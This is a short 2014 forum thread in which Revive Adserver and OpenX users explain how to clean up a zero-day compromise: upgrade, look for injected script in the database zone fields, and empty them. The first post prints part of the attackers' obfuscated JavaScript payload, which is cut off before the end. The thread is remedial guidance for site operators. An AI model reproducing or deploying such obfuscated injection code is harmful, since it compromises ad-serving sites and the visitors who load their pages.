Hey_neken Posted January 2, 2014 Report Posted January 2, 2014 If someone is suffering alerts from Avast alerting about some trojan in the invocation code as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ) please do the following: - Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on =<revive-adsever-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/- Look in 'ox_zones' table for any suspicious code. The code will be on the 'prepend' and 'append' fields. It will look something like:<script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...) - Empty those fields Quote
mx_starter Posted January 2, 2014 Report Posted January 2, 2014 I can confirm this procedure, also. My investigation showed that the code is presented in the ox_auidit table, too. Will post a separate topic in a minute... Quote
andrewatfornax Posted January 5, 2014 Report Posted January 5, 2014 For completeness, I think the separate topic suggested is http://forum.revive-adserver.com/topic/92-avast-detecting-trojan-in-the-openx-delivery/ Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.